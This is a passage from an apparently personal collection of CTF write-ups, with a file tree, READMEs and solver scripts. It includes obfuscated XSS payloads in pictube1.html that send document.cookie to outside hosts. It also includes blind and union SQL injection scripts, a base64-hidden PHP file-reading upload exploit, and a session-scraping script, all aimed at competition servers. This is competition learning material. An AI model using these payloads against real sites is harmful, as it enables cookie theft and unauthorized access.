├── 2017
    ├── Belluminar-2017
    │   ├── README.md
    │   └── color-world.pdf
    ├── Christmas-CTF-2017
    │   ├── 0-day.md
    │   ├── README.md
    │   ├── pictube1.html
    │   └── session_parser.py
    ├── H3X0R_CTF2
    │   ├── H3X0R_CTF2.pdf
    │   └── README.md
    ├── Layer7_External_CTF(2017)
    │   └── README.md
    ├── Layer7_Internal_CTF
    │   ├── Layer7_Internal_CTF_2017.pdf
    │   └── README.md
    ├── Power_of_XX(2017)
    │   └── README.md
    ├── Root-CTF
    │   ├── Write.pdf
    │   ├── calculate_decoder.py
    │   └── lotto-exploit.py
    ├── Secuinside2017-Mathboy7
    │   ├── README.md
    │   └── mathboy7.py
    ├── Sunrin_Internal_CTF2017
    │   └── 젠카이노아이마스.pdf
    └── Ubuntu-ctf(2017)
    │   ├── README.md
    │   └── write-ups.pdf
├── 2018
    ├── HITB-XCTF-2018-Quals_upload(web)
    │   └── exploit.py
    ├── NeverLAN-CTF(2018)
    │   ├── Cryptography
    │   │   ├── Don't-Hate-me
    │   │   │   ├── README.md
    │   │   │   ├── this_is_insane2.jpeg
    │   │   │   └── this_is_insane2.zip
    │   │   ├── How-much-can-you-throw-on-a-Caesar-salad
    │   │   │   └── O_SO_Curious.jpeg
    │   │   ├── Picture-Words
    │   │   │   ├── Invisible.jpeg
    │   │   │   ├── cipher.txt
    │   │   │   ├── decrypt_result.txt
    │   │   │   └── minimoy0001.gif
    │   │   ├── Story-Time!
    │   │   │   └── README.md
    │   │   ├── That's-a-big-file
    │   │   │   ├── Output.txt
    │   │   │   ├── base64.c
    │   │   │   └── decoder.py
    │   │   └── dot-dot-dashish
    │   │   │   └── README.md
    │   ├── InterWeb
    │   │   ├── README.md
    │   │   ├── das-blog.png
    │   │   └── wpscan.png
    │   ├── Passwords
    │   │   ├── Ending!=Hash
    │   │   │   └── wireshark(flag).png
    │   │   ├── SHA-1
    │   │   │   ├── README.md
    │   │   │   ├── description.txt
    │   │   │   ├── failed(python-script)
    │   │   │   │   ├── __pycache__
    │   │   │   │   │   └── brute.cpython-36.pyc
    │   │   │   │   └── brute.py
    │   │   │   ├── failed_bruteforce
    │   │   │   │   ├── __pycache__
    │   │   │   │   │   └── brute.cpython-36.pyc
    │   │   │   │   └── brute.py
    │   │   │   ├── hash.txt
    │   │   │   └── hashcat-4.1.0
    │   │   │   │   └── charsets
    │   │   │   │       ├── DES_full.charset
    │   │   │   │       ├── DES_special
    │   │   │   │           ├── DES_alpha.charset
    │   │   │   │           ├── DES_numeral.charset
    │   │   │   │           └── multiple_nodes
    │   │   │   │           │   ├── DES_portion_0.charset
    │   │   │   │           │   ├── DES_portion_1.charset
    │   │   │   │           │   ├── DES_portion_2.charset
    │   │   │   │           │   ├── DES_portion_3.charset
    │   │   │   │           │   ├── DES_portion_4.charset
    │   │   │   │           │   ├── DES_portion_5.charset
    │   │   │   │           │   ├── DES_portion_6.charset
    │   │   │   │           │   ├── DES_portion_7.charset
    │   │   │   │           │   ├── DES_portion_8.charset
    │   │   │   │           │   ├── DES_portion_9.charset
    │   │   │   │           │   ├── DES_portion_A.charset
    │   │   │   │           │   ├── DES_portion_B.charset
    │   │   │   │           │   ├── DES_portion_C.charset
    │   │   │   │           │   ├── DES_portion_D.charset
    │   │   │   │           │   ├── DES_portion_E.charset
    │   │   │   │           │   └── DES_portion_F.charset
    │   │   │   │       ├── combined
    │   │   │   │           ├── Bulgarian.hcchr
    │   │   │   │           ├── Castilian.hcchr
    │   │   │   │           ├── Catalan.hcchr
    │   │   │   │           ├── English.hcchr
    │   │   │   │           ├── French.hcchr
    │   │   │   │           ├── German.hcchr
    │   │   │   │           ├── Greek.hcchr
    │   │   │   │           ├── GreekPolytonic.hcchr
    │   │   │   │           ├── Italian.hcchr
    │   │   │   │           ├── Lithuanian.hcchr
    │   │   │   │           ├── Polish.hcchr
    │   │   │   │           ├── Portuguese.hcchr
    │   │   │   │           ├── Russian.hcchr
    │   │   │   │           ├── Slovak.hcchr
    │   │   │   │           └── Spanish.hcchr
    │   │   │   │       ├── special
    │   │   │   │           ├── Castilian
    │   │   │   │           │   ├── es-ES_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── es-ES_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── es-ES_cp1252-special.hcchr
    │   │   │   │           ├── Catalan
    │   │   │   │           │   ├── ca_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── ca_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── ca_cp1252-special.hcchr
    │   │   │   │           ├── French
    │   │   │   │           │   ├── fr_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── fr_ISO-8859-15-special.hcchr
    │   │   │   │           │   ├── fr_ISO-8859-16-special.hcchr
    │   │   │   │           │   └── fr_cp1252-special.hcchr
    │   │   │   │           ├── German
    │   │   │   │           │   ├── de_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── de_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── de_cp1252-special.hcchr
    │   │   │   │           ├── Greek
    │   │   │   │           │   ├── el_ISO-8859-7-special.hcchr
    │   │   │   │           │   └── el_cp1253-special.hcchr
    │   │   │   │           ├── Italian
    │   │   │   │           │   ├── it_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── it_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── it_cp1252-special.hcchr
    │   │   │   │           ├── Polish
    │   │   │   │           │   └── pl_cp1250-special.hcchr
    │   │   │   │           ├── Portuguese
    │   │   │   │           │   ├── pt_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── pt_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── pt_cp1252-special.hcchr
    │   │   │   │           ├── Russian
    │   │   │   │           │   ├── ru_ISO-8859-5-special.hcchr
    │   │   │   │           │   └── ru_cp1251-special.hcchr
    │   │   │   │           ├── Slovak
    │   │   │   │           │   ├── sk_ISO-8859-2-special.hcchr
    │   │   │   │           │   └── sk_cp1250-special.hcchr
    │   │   │   │           └── Spanish
    │   │   │   │           │   ├── es_ISO-8859-1-special.hcchr
    │   │   │   │           │   ├── es_ISO-8859-15-special.hcchr
    │   │   │   │           │   └── es_cp1252-special.hcchr
    │   │   │   │       └── standard
    │   │   │   │           ├── Bulgarian
    │   │   │   │               ├── bg_ISO-8859-5.hcchr
    │   │   │   │               ├── bg_KOI8-R.hcchr
    │   │   │   │               └── bg_cp1251.hcchr
    │   │   │   │           ├── Castilian
    │   │   │   │               ├── es-ES_ISO-8859-1.hcchr
    │   │   │   │               ├── es-ES_ISO-8859-15.hcchr
    │   │   │   │               └── es-ES_cp1252.hcchr
    │   │   │   │           ├── Catalan
    │   │   │   │               ├── ca_ISO-8859-1.hcchr
    │   │   │   │               ├── ca_ISO-8859-15.hcchr
    │   │   │   │               └── ca_cp1252.hcchr
    │   │   │   │           ├── English
    │   │   │   │               ├── en_ISO-8859-1.hcchr
    │   │   │   │               ├── en_ISO-8859-15.hcchr
    │   │   │   │               └── en_cp1252.hcchr
    │   │   │   │           └── French
    │   │   │   │               ├── fr_ISO-8859-1.hcchr
    │   │   │   │               ├── fr_ISO-8859-15.hcchr
    │   │   │   │               └── fr_cp1252.hcchr
    │   │   ├── The-WIFI-Network
    │   │   │   ├── README.md
    │   │   │   ├── flag.png
    │   │   │   ├── neverlan.cap
    │   │   │   └── neverlan.hccapx
    │   │   └── Zip-Attack
    │   │   │   ├── README.md
    │   │   │   ├── encrypted.zip
    │   │   │   ├── known-file.zip
    │   │   │   └── sw-iphone-wallpaper-first-order.jpg
    │   ├── README.md
    │   ├── Recon
    │   │   ├── Happy hunting.txt
    │   │   ├── Neo's-recon.png
    │   │   ├── Purvesta's-recon.png
    │   │   ├── Viking's-recon.png
    │   │   ├── Zesty's-challenge.png
    │   │   └── s7a73farm's-recon.png
    │   ├── Reversing
    │   │   └── Commitment-Issues
    │   │   │   └── Commitmen-Issues(flag).png
    │   ├── Scripting
    │   │   ├── JSON-parsing-1
    │   │   │   ├── file-20171020T1500
    │   │   │   └── statistics.py
    │   │   ├── basic-math
    │   │   │   └── sum.py
    │   │   ├── even-more-basic-math-with-some-junk
    │   │   │   ├── even_more_numbers_with_some_mild_inconveniences.txt
    │   │   │   └── sum.py
    │   │   └── more-basic-math
    │   │   │   ├── some_more_numbers.txt
    │   │   │   └── sum.py
    │   ├── Trivia
    │   │   ├── How_far_can_you_go(not-solved)
    │   │   │   ├── 1.txt
    │   │   │   ├── 2.zip
    │   │   │   ├── 3.zip
    │   │   │   └── Alice.zip
    │   │   └── README.md
    │   ├── challenge-screenshot.png
    │   └── ranking-screenshot.png
    └── Timisoara-CTF-2018-Final
    │   └── README.md
├── 2019
    └── 19Cyberoc
    │   ├── 19Cyberoc - Secret Service (Hidden Service) Write up.pdf
    │   ├── README.md
    │   └── flag.png
├── 2020
    └── Defenit_CTF
    │   ├── web1-fortune-cookie
    │       └── exploit.py
    │   ├── web2-highlighter
    │       └── tq.txt
    │   ├── web3-tar-analyzer
    │       ├── .COMMAND
    │       ├── .SET_ADMIN
    │       └── exploit.py
    │   └── web4-babyjs
    │       └── exploit.py
└── README.md


/2017/Belluminar-2017/README.md:
--------------------------------------------------------------------------------
 1 | # Belluminar-2017-Color-word
 2 | 
 3 | ~~~
 4 | 
 5 | prob : color-world
 6 | date : 2017.11.09
 7 | 
 8 | made by munsiwoo
 9 | 
10 | ~~~
11 | 


--------------------------------------------------------------------------------
/2017/Belluminar-2017/color-world.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Belluminar-2017/color-world.pdf


--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/0-day.md:
--------------------------------------------------------------------------------
 1 | ### 0-day 삽질한거
 2 | 
 3 | ~~~
 4 | 1. 파일 업로드에서 shtml, xml, xhtml 등 올려서 rce, xxe 시도
 5 | 2. sqli, lfi 찾다가 안보여서 포기
 6 | 3. 세션에서 admin 계정 찾아보기 (session_parser.py 참고)
 7 | ~~~
 8 | 
 9 | ~~~
10 | 결론 : 진짜 0-day 였다.
11 | ~~~
12 | 


--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/README.md:
--------------------------------------------------------------------------------
 1 | # x mas-ctf-2017 (1st)
 2 | 
 3 | 
 4 | #### session-parser.py
 5 | ~~~
 6 | 그누보드에는 /data/session/에서 세션을 관리한다.
 7 | /data/session/에 있는 세션에서 admin 세션을 찾는 스크립트
 8 | ~~~
 9 | 
10 | #### 0-day.md
11 | ~~~
12 | 0-day 문제 풀면서 삽질했던 거 정리해봤다.
13 | ~~~
14 | 
15 | #### pictube1.html
16 | ~~~
17 | 픽튜브1 풀며 원평이형, 석찬이와 삽질했던 내용이다.
18 | 픽튜브1는 거의 다 풀었는데 대회가 끝나버렸다.
19 | pictube1.html 와 같은 방식으로 풀 수 있고, jsfuck 난독화를 해서 풀수도 있었다.
20 | 내가 쓴 pictube1.html 방법은 ([]+prompt)[0] 이런식으로 문자를 만들고
21 | self['docu'+'ment']['cookie'] 이렇게 'document', 'cookie'자리에 넣어서
22 | 객체에 접근하거나 함수를 실행시키는 방식이었는데, location이 사용 불가능하다는 것을
23 | 대회 끝나고 알았다. 다음에는 location 말고도 여러 방법으로 접근해봐야겠다.
24 | ~~~
25 | 


--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/pictube1.html:
--------------------------------------------------------------------------------
1 | <script>self[([]+prompt)[31]+([]+prompt)[25]+([]+prompt)[22]+([]+Blob)[10]](self[([]+Screen)[9]+([]+Screen)[23]+([]+Screen)[11]+([]+Screen)[5]+([]+Screen)[2]+([]+DragEvent)[12]][([]+prompt)[0]+([]+prompt)[10]+([]+prompt)[11]+([]+prompt)[12]+([]+Crypto)[9]+([]+Math)[11]+([]+prompt)[22]+([]+resizeTo)[9]+([]+Crypto)[9]+([]+prompt)[29]+([]+prompt)[30]+([]+prompt)[31]](100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,112,101,110,103,46,107,114,47,63,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59))</script>
2 | <!--<script>self[([]+prompt)[31]+([]+prompt)[25]+([]+prompt)[22]+([]+Boolean)[12]](self[([]+Screen)[9]+([]+Screen)[23]+([]+Screen)[11]+([]+Screen)[5]+([]+Screen)[2]+([]+debug)[13]][([]+prompt)[0]+([]+prompt)[10]+([]+prompt)[11]+([]+prompt)[12]+([]+Cache)[9]+([]+Math)[11]+([]+prompt)[22]+([]+resizeTo)[9]+([]+Cache)[9]+([]+Cache)[6]+([]+Cache)[29]+([]+prompt)[31]](100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 39, 104, 116, 116, 112, 58, 47, 47, 112, 101, 110, 103, 46, 107, 114, 47, 63, 39, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59))</script>-->
3 | <!--<script>self[([]+parseFloat)[15]+([]+parseFloat)[16]+([]+parseFloat)[3]+([]+parseFloat)[10]+([]+parseFloat)[4]+([]+parseFloat)[5]+([]+parseFloat)[6]+([]+parseFloat)[7]][([]+resizeBy)[9]+([]+resizeBy)[10]+([]+parseInt)[9]+([]+Blob)[10]+([]+prompt)[22]+([]+prompt)[3]+([]+prompt)[31]](self[([]+Storage)[9]+([]+Storage)[10]+([]+Storage)[12]+([]+Storage)[5]+([]+Storage)[2]+([]+Storage)[14]][([]+prompt)[0]+([]+prompt)[10]+([]+prompt)[11]+([]+prompt)[12]+([]+Cache)[9]+([]+WheelEvent)[10]+([]+prompt)[22]+([]+resizeTo)[9]+([]+Cache)[9]+([]+Cache)[6]+([]+Cache)[29]+([]+Cache)[30]](47,47,115,101,101,118,97,114,46,105,112,116,105,109,101,46,111,114,103,47,120,115,115,46,112,104,112,63)+self[([]+decodeURI)[9]+([]+parseFloat)[16]+([]+decodeURI)[11]+([]+decodeURI)[1]+([]+moveTo)[9]+([]+decodeURI)[10]+([]+decodeURI)[7]+([]+parseFloat)[18]][([]+prompt)[3]+([]+prompt)[6]+([]+prompt)[6]+([]+Worker)[12]+([]+prompt)[5]+([]+prompt)[26]])</script>-->


--------------------------------------------------------------------------------
/2017/Christmas-CTF-2017/session_parser.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from bs4 import BeautifulSoup
 3 | 
 4 | # made by munsiwoo
 5 | 
 6 | url = "http://45.32.105.237/data/session/?C=S;O=D"
 7 | html = requests.get(url).text
 8 | soup = BeautifulSoup(html, 'html.parser')
 9 | admin_session = []
10 | 
11 | for x in range(5, html.count("<a")) :
12 | 	session = soup.find_all('a')[x].get_text()
13 | 	url = "http://45.32.105.237/data/session/"+str(session)
14 | 	print(url)
15 | 	contents = requests.get(url).text
16 | 	if(contents.find("admin") != -1):
17 | 		admin_session.append(session)
18 | 		print(session)
19 | 
20 | print(admin_session)


--------------------------------------------------------------------------------
/2017/H3X0R_CTF2/H3X0R_CTF2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/H3X0R_CTF2/H3X0R_CTF2.pdf


--------------------------------------------------------------------------------
/2017/H3X0R_CTF2/README.md:
--------------------------------------------------------------------------------
1 | H3X0R CTF2
2 | =============
3 | 2017.01.07 ~ 2017.01.08
4 | -------------


--------------------------------------------------------------------------------
/2017/Layer7_External_CTF(2017)/README.md:
--------------------------------------------------------------------------------
1 | # Layer7-External-CTF-2017
2 | 
3 | > can you bypass me? - regexp bypass, wild card, eval injection
4 | 
5 | > daily life of Daniel - xss with bbcode bypass
6 | 
7 | > present - reflected xss
8 | ------------------------------------
9 | http://siwoomun.blogspot.kr/2017/10/layer7-external-ctf-2017-write-ups.html


--------------------------------------------------------------------------------
/2017/Layer7_Internal_CTF/Layer7_Internal_CTF_2017.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Layer7_Internal_CTF/Layer7_Internal_CTF_2017.pdf


--------------------------------------------------------------------------------
/2017/Layer7_Internal_CTF/README.md:
--------------------------------------------------------------------------------
1 | Layer7 Internal CTF (2017)
2 | =============
3 | 2017-08-19 09:00 ~ 2017-08-19 21:00
4 | -------------
5 | ###### ctf.layer7.kr


--------------------------------------------------------------------------------
/2017/Power_of_XX(2017)/README.md:
--------------------------------------------------------------------------------
 1 | # Power-of-XX-2017_CTF-Write-ups
 2 | 
 3 | > Basic Web ( LFI + BSQLi )
 4 | 
 5 | https://github.com/munsiwoo/problems/blob/master/power_of_xx_2017/basic_web/exploit.py
 6 | 
 7 | > sqlgame (SQLi)
 8 | 
 9 | 1+union+select+0x303037,1,1%23'+union+select+1,0x62616e67,schema()%23"+union+select+1,2,'007'%23
10 | 
11 | ------------------------------------
12 | http://siwoomun.blogspot.kr/2017/10/power-of-xx-2017-write-ups.html
13 | 


--------------------------------------------------------------------------------
/2017/Root-CTF/Write.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Root-CTF/Write.pdf


--------------------------------------------------------------------------------
/2017/Root-CTF/calculate_decoder.py:
--------------------------------------------------------------------------------
 1 | """
 2 | Root CTF - calculate
 3 | made by munsiwoo
 4 | """
 5 | 
 6 | def a(num, size):
 7 |     r = num + size
 8 |     r += 915
 9 |     return r
10 | 
11 | def b(num, size):
12 |     r = num - size
13 |     r -= 372
14 |     return r
15 | 
16 | def c(num, size):
17 |     r = num ^ size
18 |     r ^= 826
19 |     return r
20 | 
21 | def d(num, size):
22 |     size %= 32
23 |     r = num >> (32 - size)
24 |     b = (num << size) - (r << 32)
25 |     return b + r
26 | 
27 | def enc(argv):
28 |     argv = a(ord(argv), 100)
29 |     argv = b(argv, 100)
30 |     argv = c(argv, 100)
31 |     argv = d(argv, 100)
32 |     return argv
33 | 
34 | def main() :
35 |     flag = [5040, 4944, 5088, 4992, 7232, 4848, 7584, 7344, 4288, 7408, 7360, 7584, 4608, 4880, 4320, 7328, 7360, 
36 |     4608, 4896, 4320, 7472, 7328, 7360, 4608, 4752, 4368, 4848, 4608, 4848, 4368, 4944, 7200]
37 | 
38 |     alpha1 = "abcdefghijklmnopqrstuvwxyz"
39 |     alpha2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
40 |     special = "!@#$%^&*()-_+=[]{}\;:\'\"<>,./"
41 |     number = "0123456789"
42 |     chars = alpha1+alpha2+special+number
43 |     table = {}
44 | 
45 |     for x in chars :
46 |         table[str(enc(x))] = str(x)
47 | 
48 |     for x in flag :
49 |         print(table[str(x)], end="")
50 | 
51 |     print()
52 | 
53 | if __name__ == "__main__" :
54 |     main()


--------------------------------------------------------------------------------
/2017/Root-CTF/lotto-exploit.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from urllib.parse import quote
 3 | 
 4 | user = (lambda a,b,c:"http://sdhsroot.kro.kr/HexLotto/data/%s.php?id=%s&pw=%s"%(a,b,c))
 5 | payload = (lambda a:"'&&(select database())like('"+a+"%')#")
 6 | data = "num[]=0&num[]=0&num[]=0&num[]=0&num[]=0&num[]=0"
 7 | result = ""
 8 | 
 9 | # table : hexlotto
10 | # columns : id, pw, point, number
11 | 
12 | # 풀이 : 새로 가입한 뒤 해당 계정의 number를 가져와 로또 번호에 넣으면 당첨이다.
13 | 
14 | for x in range(0, 20) :
15 | 	for y in ".0123456789abcdefghijklmnopqrstuvwxyz()-_" :
16 | 		username = quote(payload(result+y))
17 | 		print(payload(result+y))
18 | 		requests.get(user('signup', username, username))
19 | 		req = requests.get(user('login', username, username))
20 | 		requests.post("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", data=data, cookies=req.cookies)
21 | 		res = requests.post("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", data=data, cookies=req.cookies).content
22 | 		requests.get("http://sdhsroot.kro.kr/HexLotto/data/lotto.php", cookies=req.cookies)
23 | 
24 | 		if(str(res).find("alert") == -1) :
25 | 			result += y
26 | 			break
27 | 		if(y == '_') :
28 | 			print("result : "+result)
29 | 			exit(1)
30 | 
31 | 


--------------------------------------------------------------------------------
/2017/Secuinside2017-Mathboy7/README.md:
--------------------------------------------------------------------------------
1 | Mathboy7 Write-up
2 | -------------
3 | ### 2017.07.01 09:00(KST) - 07.02 16:33(KST)
4 | *****
5 | #### https://siwoomun.blogspot.kr/2017/07/secuinside-ctf-2017-mathboy7-write-up.html


--------------------------------------------------------------------------------
/2017/Secuinside2017-Mathboy7/mathboy7.py:
--------------------------------------------------------------------------------
 1 | # -*- coding:utf-8 -*-
 2 | 
 3 | # github.com/munsiwoo
 4 | 
 5 | import httplib, urllib2
 6 | 
 7 | conn = httplib.HTTPConnection('52.78.77.229')
 8 | header = {'Content-Type': 'application/x-www-form-urlencoded'}
 9 | 
10 | param1 = '/index.php?id=%bf\&pw='
11 | param2 = 'union select mid(encrypt(rand(),mid(password(pi()),floor(pi()*pi()*floor(pi()))+ceil(pi()+pi()),true+true)),true,pi()+true+true),true,true#' # payload
12 | query = param1 + urllib2.quote(param2)
13 | 
14 | while(1):
15 |     conn.request('GET', query3, '', header)
16 |     response = str(conn.getresponse().read())
17 |     # response[33:38] == 'ad' + random three characters
18 | 
19 |     admin = response[33:38].lower()
20 | 
21 |     if(admin == 'admin'):
22 |         print response
23 |         break
24 | 
25 | conn.close()


--------------------------------------------------------------------------------
/2017/Sunrin_Internal_CTF2017/젠카이노아이마스.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Sunrin_Internal_CTF2017/젠카이노아이마스.pdf


--------------------------------------------------------------------------------
/2017/Ubuntu-ctf(2017)/README.md:
--------------------------------------------------------------------------------
1 | # Kookmin-univ & Ubuntu CTF
2 | ~~~
3 | 날짜 : 2017.11.05
4 | 팀명 : 새싹보끔밥 (3rd)
5 | ~~~


--------------------------------------------------------------------------------
/2017/Ubuntu-ctf(2017)/write-ups.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2017/Ubuntu-ctf(2017)/write-ups.pdf


--------------------------------------------------------------------------------
/2018/HITB-XCTF-2018-Quals_upload(web)/exploit.py:
--------------------------------------------------------------------------------
 1 | from requests import get, post
 2 | from base64 import b64decode
 3 | 
 4 | '''
 5 |  hitb xctf 2018 quals
 6 |  upload (web) - windows directory wildcard
 7 | 
 8 |  made by munsiwoo
 9 | '''
10 | 
11 | def length_adjust(argv) :
12 | 	length = 32 - len(argv)
13 | 	for x in range(length) :
14 | 		argv += '>'
15 | 	return argv
16 | 
17 | def webshell_upload() :
18 | 	uri = 'http://47.90.97.18:9999/upload.php'
19 | 	headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryx96MAR4SB4Yfdvog'}
20 | 
21 | 	body =  'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5eDk2TUFSNFNCNFlmZHZvZwpDb250ZW50LURp'
22 | 	body += 'c3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGUiOyBmaWxlbmFtZT0iLlBIUCIK'
23 | 	body += 'Q29udGVudC1UeXBlOiBpbWFnZS9wbmcKCkdJRjg5YS4uLi4uLjw/cGhwIGVjaG8gZmls'
24 | 	body += 'ZV9nZXRfY29udGVudHMoJy4uL2ZsYWcucGhwJyk7ID8+Ci0tLS0tLVdlYktpdEZvcm1C'
25 | 	body += 'b3VuZGFyeXg5Nk1BUjRTQjRZZmR2b2cKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1k'
26 | 	body += 'YXRhOyBuYW1lPSJzdWJtaXQiCgp1cGxvYWQKLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5'
27 | 	body += 'eDk2TUFSNFNCNFlmZHZvZy0t' # <?php echo file_get_contents('../flag.php'); ?>
28 | 
29 | 	body = b64decode(body).decode()
30 | 	return post(uri, headers=headers, data=body).text[1:]
31 | 
32 | def main() :
33 | 	uri = 'http://47.90.97.18:9999/'
34 | 	payload = (lambda x,y:'pic.php?filename=../{}/{}'.format(x,y))
35 | 	webshell = webshell_upload()
36 | 	directory = '87194f13726af7cee27ba2cfe97b60'
37 | 	# directory = '87194f13726af7cee27ba2cfe97b60df'
38 | 	# flag is in the /flag.php
39 | 
40 | 	for x in range(len(directory), 32) :
41 | 		for y in 'abcdef0123456789' :
42 | 			request = uri + payload(length_adjust(directory + y), webshell)
43 | 			response = get(request).text
44 | 			
45 | 			if(response.find("image error") == -1) :
46 | 				directory += y
47 | 				break
48 | 
49 | 		print('directory : ' + directory)
50 | 
51 | 	print(get(uri + directory + '/' + webshell).text)
52 | 
53 | 
54 | if __name__ == '__main__' :
55 | 	main()
56 | 


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/README.md:
--------------------------------------------------------------------------------
 1 | # Don't-Hate-me (600)
 2 | 
 3 | 
 4 | 첫번째 힌트로 압축파일의 비밀번호를 알 수 있었다.
 5 | 
 6 | 그리고 춤추는 졸라맨이 가득한 사진을 볼 수 있는데
 7 | 
 8 | 이건 텐달러 CTF에서 한번 풀어봤던 Dancing men ciper다.
 9 | 
10 | (https://www.dcode.fr/dancing-men-cipher)
11 | 
12 | 
13 | 
14 | ~~~
15 | 1. kjhtcriw
16 | 2. ruodhcvc
17 | 3. xnhddhck
18 | 4. cjniuicc
19 | 5. ppzckwkw
20 | 6. ecxffqbn
21 | 7. rgjwzdgw
22 | 8. gyovofmn
23 | 9. obdrhcqj
24 | 10. asxowcpl
25 | 11. jbktzdyr
26 | 12. rhohmnst
27 | 13. fumeeeux
28 | 14. zmugwtxz
29 | 15. mtjzefeq
30 | 16. kztgkzup
31 | 
32 | 
33 | kjhtcriwruodhcvcxnhddhckcjniuiccppzckwkwecxffqbnrgjwzdgwgyovofmnobdrhcqjasxowcpljbktzdyrrhohmnstfumeeeuxzmugwtxzmtjzefeqkztgkzup
34 | 
35 | kjhtcriwruodhcvcxnhddhckcjniuiccppzckwkwecxffqbnrgjwzdgwgyovofmnobdrhcqjasxowcpljbktzdyrrhohmnstfumeeeuxzmugwtxzmtjzefeqkztgkzup
36 | 
37 | kztgkzupmtjzefeqzmugwtxzfumeeeuxrhohmnstjbktzdyrasxowcplobdrhcqjgyovofmnrgjwzdgwecxffqbnppzckwkwcjniuiccxnhddhckruodhcvckjhtcriw
38 | ~~~
39 | 
40 | 비네제르 사이퍼라고 생각해서 이것 저것 시도해봤지만 결국 못풀었다.
41 | 
42 | 
43 | 
44 | maybe vigenere cipher..
45 | 
46 | but i failed to key crack :(


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.jpeg


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Don't-Hate-me/this_is_insane2.zip


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/How-much-can-you-throw-on-a-Caesar-salad/O_SO_Curious.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/How-much-can-you-throw-on-a-Caesar-salad/O_SO_Curious.jpeg


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/Invisible.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/Invisible.jpeg


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/cipher.txt:
--------------------------------------------------------------------------------
1 | https://www.dcode.fr/arthur-invisibles-cipher


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/decrypt_result.txt:
--------------------------------------------------------------------------------
 1 | WHENSOLVIN
 2 | GPROBLEMSD
 3 | IGATTHEROO
 4 | TSINSTEADO
 5 | FJUSTHACKI
 6 | NGATTHELEA
 7 | VESFLAGISP
 8 | ICTURESWOR
 9 | THATHOUSAN
10 | DWORDS
11 | 
12 | WHEN SO LVING PROBLEMS DIGAT THE ROOTS IN STEAD OF JUST HACKING AT THE LEAVES FLAG IS PICTURESWORTHATHOUSANDWORDS
13 | 
14 | flag is pictures worth a thousand words
15 | 
16 | flag{pictures worth a thousand words}


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/minimoy0001.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Cryptography/Picture-Words/minimoy0001.gif


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/Story-Time!/README.md:
